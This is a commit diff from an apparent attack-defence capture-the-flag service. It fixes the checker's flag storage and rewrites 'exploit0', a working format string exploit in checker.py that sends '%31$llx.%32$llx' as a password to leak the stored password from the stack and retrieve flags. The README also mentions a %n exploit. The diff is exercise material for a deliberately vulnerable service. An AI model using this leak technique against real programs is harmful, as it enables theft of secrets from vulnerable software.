fix checker bug for enochecker_test

enowars · May 27, 2024 · bd690ba · bd690ba
1 parent 019da53
commit bd690ba
Show file tree

Hide file tree

Showing 22 changed files with 74 additions and 61 deletions.
diff --git a/README.md b/README.md
@@ -21,7 +21,7 @@
 - [ ] Implement protected folders from which opening files is not possible. Determine best vuln to implement here (overwrite is_admin thing vs explore race conditions requiring multiple connections vs combining elements from both approaches).
 - [x] Implement the checker
 - [x] Remove chdir to prevent issues with threads
-- [ ] Fix setup the way the slides from the lectures wanted (documention folder, docker compose up should work automatically, .yml file for some CI/CD stuff)
+- [x] Fix setup the way the slides from the lectures wanted (documention folder, docker compose up should work automatically, .yml file for some CI/CD stuff)
 - [ ] Test a whole bunch to make sure there aren't unwanted exploits. Questions so far:
 
   - [x] How to prevent %n exploit that can change the actual password for the first exploit. This might be bad if it inferes and ruins the experience for the other groups as they can then no longer use the intended exploit.

diff --git a/checker3/data/WiredTiger.turtle b/checker3/data/WiredTiger.turtle
@@ -3,4 +3,4 @@ WiredTiger 11.2.0: (November 10, 2022)
 WiredTiger version
 major=11,minor=2,patch=0
 file:WiredTiger.wt
-access_pattern_hint=none,allocation_size=4KB,app_metadata=,assert=(commit_timestamp=none,durable_timestamp=none,read_timestamp=none,write_timestamp=off),block_allocation=best,block_compressor=,cache_resident=false,checksum=on,collator=,columns=,dictionary=0,encryption=(keyid=,name=),format=btree,huffman_key=,huffman_value=,id=0,ignore_in_memory_cache_size=false,internal_item_max=0,internal_key_max=0,internal_key_truncate=true,internal_page_max=4KB,key_format=S,key_gap=10,leaf_item_max=0,leaf_key_max=0,leaf_page_max=32KB,leaf_value_max=0,log=(enabled=true),memory_page_image_max=0,memory_page_max=5MB,os_cache_dirty_max=0,os_cache_max=0,prefix_compression=false,prefix_compression_min=4,readonly=false,split_deepen_min_child=0,split_deepen_per_child=0,split_pct=90,tiered_object=false,tiered_storage=(auth_token=,bucket=,bucket_prefix=,cache_directory=,local_retention=300,name=,object_target_size=0),value_format=S,verbose=[],version=(major=1,minor=1),write_timestamp_usage=none,checkpoint=(WiredTigerCheckpoint.12=(addr="018081e4e4e58bf98181e48b29d96e8281e41a19d456808080e3014fc0e25fc0",order=12,time=1716787015,size=36864,newest_start_durable_ts=0,oldest_start_ts=0,newest_txn=6,newest_stop_durable_ts=0,newest_stop_ts=-1,newest_stop_txn=-11,prepare=0,write_gen=33,run_write_gen=26)),checkpoint_backup_info=,checkpoint_lsn=(3,6528)
+access_pattern_hint=none,allocation_size=4KB,app_metadata=,assert=(commit_timestamp=none,durable_timestamp=none,read_timestamp=none,write_timestamp=off),block_allocation=best,block_compressor=,cache_resident=false,checksum=on,collator=,columns=,dictionary=0,encryption=(keyid=,name=),format=btree,huffman_key=,huffman_value=,id=0,ignore_in_memory_cache_size=false,internal_item_max=0,internal_key_max=0,internal_key_truncate=true,internal_page_max=4KB,key_format=S,key_gap=10,leaf_item_max=0,leaf_key_max=0,leaf_page_max=32KB,leaf_value_max=0,log=(enabled=true),memory_page_image_max=0,memory_page_max=5MB,os_cache_dirty_max=0,os_cache_max=0,prefix_compression=false,prefix_compression_min=4,readonly=false,split_deepen_min_child=0,split_deepen_per_child=0,split_pct=90,tiered_object=false,tiered_storage=(auth_token=,bucket=,bucket_prefix=,cache_directory=,local_retention=300,name=,object_target_size=0),value_format=S,verbose=[],version=(major=1,minor=1),write_timestamp_usage=none,checkpoint=(WiredTigerCheckpoint.87=(addr="019381e40a6274449481e4e79223679581e4f22e4078808080e3014fc0e25fc0",order=87,time=1716811161,size=36864,newest_start_durable_ts=0,oldest_start_ts=0,newest_txn=69,newest_stop_durable_ts=0,newest_stop_ts=-1,newest_stop_txn=-11,prepare=0,write_gen=254,run_write_gen=207)),checkpoint_backup_info=,checkpoint_lsn=(8,40832)
diff --git a/checker3/data/WiredTiger.wt b/checker3/data/WiredTiger.wt
diff --git a/checker3/data/collection-0-3767779173863406023.wt b/checker3/data/collection-0-3767779173863406023.wt
diff --git a/checker3/data/collection-2--6895972916108036508.wt b/checker3/data/collection-2--6895972916108036508.wt
diff --git a/checker3/data/collection-4--6895972916108036508.wt b/checker3/data/collection-4--6895972916108036508.wt
diff --git a/checker3/data/diagnostic.data/metrics.2024-05-27T10-53-31Z-00000 b/checker3/data/diagnostic.data/metrics.2024-05-27T10-53-31Z-00000
diff --git a/checker3/data/diagnostic.data/metrics.2024-05-27T11-15-59Z-00000 b/checker3/data/diagnostic.data/metrics.2024-05-27T11-15-59Z-00000
diff --git a/checker3/data/diagnostic.data/metrics.2024-05-27T11-20-35Z-00000 b/checker3/data/diagnostic.data/metrics.2024-05-27T11-20-35Z-00000
diff --git a/checker3/data/diagnostic.data/metrics.2024-05-27T11-24-23Z-00000 b/checker3/data/diagnostic.data/metrics.2024-05-27T11-24-23Z-00000
diff --git a/checker3/data/diagnostic.data/metrics.2024-05-27T11-43-22Z-00000 b/checker3/data/diagnostic.data/metrics.2024-05-27T11-43-22Z-00000
diff --git a/checker3/data/diagnostic.data/metrics.interim b/checker3/data/diagnostic.data/metrics.interim
diff --git a/checker3/data/index-1-3767779173863406023.wt b/checker3/data/index-1-3767779173863406023.wt
diff --git a/checker3/data/index-2-3767779173863406023.wt b/checker3/data/index-2-3767779173863406023.wt
diff --git a/checker3/data/index-3--6895972916108036508.wt b/checker3/data/index-3--6895972916108036508.wt
diff --git a/checker3/data/index-5--6895972916108036508.wt b/checker3/data/index-5--6895972916108036508.wt
diff --git a/checker3/data/index-6--6895972916108036508.wt b/checker3/data/index-6--6895972916108036508.wt
diff --git a/...er3/data/journal/WiredTigerLog.0000000003 → ...er3/data/journal/WiredTigerLog.0000000008 b/...er3/data/journal/WiredTigerLog.0000000003 → ...er3/data/journal/WiredTigerLog.0000000008
diff --git a/checker3/data/mongod.lock b/checker3/data/mongod.lock
@@ -0,0 +1 @@
+1
diff --git a/checker3/data/sizeStorer.wt b/checker3/data/sizeStorer.wt
diff --git a/checker3/src/checker.py b/checker3/src/checker.py
@@ -132,7 +132,7 @@ async def putflag_note(
     await conn.create_treasure(directory, filename, password, message, task.flag, random_time)
 
     # Save as an entry in the db for getflag() to use later.
-    await db.set("treasurefile", (directory, filename, password, task.flag))
+    await db.set(task.flag, (directory, filename, password, task.flag))
 
     # Exit
     conn.writer.write(f"dock".encode())
@@ -142,10 +142,12 @@ async def putflag_note(
 async def getflag_note(
     task: GetflagCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection
 ) -> None:
+
+    logger.debug("Getting flag: " + task.flag)
     try:
-        directory, filename, password, flag = await db.get("treasurefile")
+        directory, filename, password, flag = await db.get(task.flag)
     except KeyError:
-        raise MumbleException("Missing database entry from putflag")
+        raise MumbleException(f"Missing database entry for {task.flag} from putflag")
 
     logger.debug(f"File info: {directory}/{filename} with password {password} and flag {flag}")
     await conn.reader.readuntil(b"$ ")
@@ -173,6 +175,8 @@ async def getflag_note(
     conn.writer.write(f"dock\n".encode())
     await conn.writer.drain()
 
+
+# Note: Currently very slow as it doesn't know which file contains the given flag, and will therefore exploit all treasure files
 @checker.exploit(0)
 async def exploit0(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger: LoggerAdapter) -> Optional[str]:
 
@@ -182,76 +186,84 @@ async def exploit0(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn
     directories = await conn.get_dirs()
     logger.debug(f"Directories output: {directories}")
 
-    treasure_dir = ""
-    treasure_file = ""
+    treasure_dir = {}
 
-    # Loop through each directory and scout for the .treasure file
+    # Loop through each directory and scout for .treasure files
     for directory in directories:
         conn.writer.write(f'scout {directory}\n'.encode())
         await conn.writer.drain()
         scout_output = (await conn.reader.readuntil(b"$ ")).decode()
 
-        # Check if the .treasure file is in the directory
+        # Check if there is a .treasure file in the directory
         if '.treasure' in scout_output:
             logger.debug(f".treasure file found in {directory}")
-            treasure_dir = directory
-            # find the full name of the treasure file
+            treasure_dir[directory] = []
+            # find the full name of the treasure file and append it to the list
             scout_output = scout_output.replace('\r', '').split('\n')
-            for idx, line in enumerate(scout_output):
+            for line in (scout_output):
                 if '.treasure' in line:
-                    treasure_line_idx = idx
-                    break
-            treasure_file = scout_output[treasure_line_idx]
-            break
+                    treasure_dir[directory].append(line)
 
     # if treasure_dir is still empty, report mumble exception
-    if treasure_dir == "" or treasure_file == "":
-        raise MumbleException("No .treasure file found")
-
-    # Change to the directory and loot the treasure
-    conn.writer.write(f'sail {treasure_dir}\n'.encode())
-    await conn.writer.drain()
-    await conn.reader.readuntil(b"$ ")
-
-    conn.writer.write(f'loot {treasure_file}\n'.encode())
-    await conn.writer.drain()
-
-    # Handle the output and wait for the password prompt
-    await conn.reader.readuntil(b": ")
-
-    # Send the format string exploit as the password
-    conn.writer.write(b'%31$llx.%32$llx\n')
-    await conn.writer.drain()
+    if len(treasure_dir) == 0:
+        raise MumbleException("No .treasure files found")
 
-    # Read the buffer to get the incorrect password message
-    incorrect_message = (await conn.reader.readuntil(b"$ ")).decode()
-
-    # Extract the two addresses from the incorrect message
-    address1_hex, address2_hex = incorrect_message.split(',')[0].split('.')
-
-    # Convert the addresses to ASCII and reverse them
-    address1 = bytes.fromhex(address1_hex).decode()[::-1]
-    address2 = bytes.fromhex(address2_hex).decode()[::-1]
-
-    # Print the password
-    password = f'{address1}{address2}'
-    logger.debug(f'Incorrect message: {incorrect_message}\nAddress 1 Hex: {address1_hex}\nAddress 2 Hex: {address2_hex}\nPassword: {password}')
-
-    # Now try to plunder the file again
-    conn.writer.write(f'loot {treasure_file}\n'.encode())
-    await conn.writer.drain()
-    await conn.reader.readuntil(b": ")
-
-    conn.writer.write(f'{password}\n'.encode())
-    await conn.writer.drain()
 
-    # Wait for the output and print it
-    result = await conn.reader.readuntil(b"$ ")
-    logger.debug(result.decode())
+    # For each directory, try to loot the treasure
+    for directory in treasure_dir:
 
-    # Check for the flag in the result
-    if flag := searcher.search_flag(result):
-        return flag
+        # Change to the directory and loot the treasure
+        conn.writer.write(f'sail {directory}\n'.encode())
+        await conn.writer.drain()
+        await conn.reader.readuntil(b"$ ")
+
+        # For each file in the directory, try to loot it
+        for treasure_file in treasure_dir[directory]:
+
+            conn.writer.write(f'loot {treasure_file}\n'.encode())
+            await conn.writer.drain()
+
+            # Handle the output and wait for the password prompt
+            await conn.reader.readuntil(b": ")
+
+            # Send the format string exploit as the password
+            conn.writer.write(b'%31$llx.%32$llx\n')
+            await conn.writer.drain()
+
+            # Read the buffer to get the incorrect password message
+            incorrect_message = (await conn.reader.readuntil(b"$ ")).decode()
+
+            # Extract the two addresses from the incorrect message
+            address1_hex, address2_hex = incorrect_message.split(',')[0].split('.')
+
+            # Convert the addresses to ASCII and reverse them
+            address1 = bytes.fromhex(address1_hex).decode()[::-1]
+            address2 = bytes.fromhex(address2_hex).decode()[::-1]
+
+            # Print the password
+            password = f'{address1}{address2}'
+            logger.debug(f'Incorrect message: {incorrect_message}\nAddress 1 Hex: {address1_hex}\nAddress 2 Hex: {address2_hex}\nPassword: {password}')
+
+            # Now try to plunder the file again
+            conn.writer.write(f'loot {treasure_file}\n'.encode())
+            await conn.writer.drain()
+            await conn.reader.readuntil(b": ")
+
+            conn.writer.write(f'{password}\n'.encode())
+            await conn.writer.drain()
+
+            # Wait for the output and print it
+            result = await conn.reader.readuntil(b"$ ")
+            logger.debug(result.decode())
+
+            # Check for the flag in the result
+            if flag := searcher.search_flag(result):
+                return flag
+
+        # Exit the directory
+        conn.writer.write('sail ..\n'.encode())
+        await conn.writer.drain()
+        await conn.reader.readuntil(b"$ ")
 
     raise MumbleException("flag not found")
 

diff --git a/service/src/cli.c b/service/src/cli.c
@@ -72,7 +72,7 @@ int interact_cli(session_t *session)
     else if (strncmp(command, "bury", 255) == 0)
     {
         char file_path[1024] = "";
-        char custom_ID[20] = "";
+        char custom_ID[128] = "";
         char *argument1 = strchr(input, ' ');
         if (argument1 && *(argument1 + 1))
         {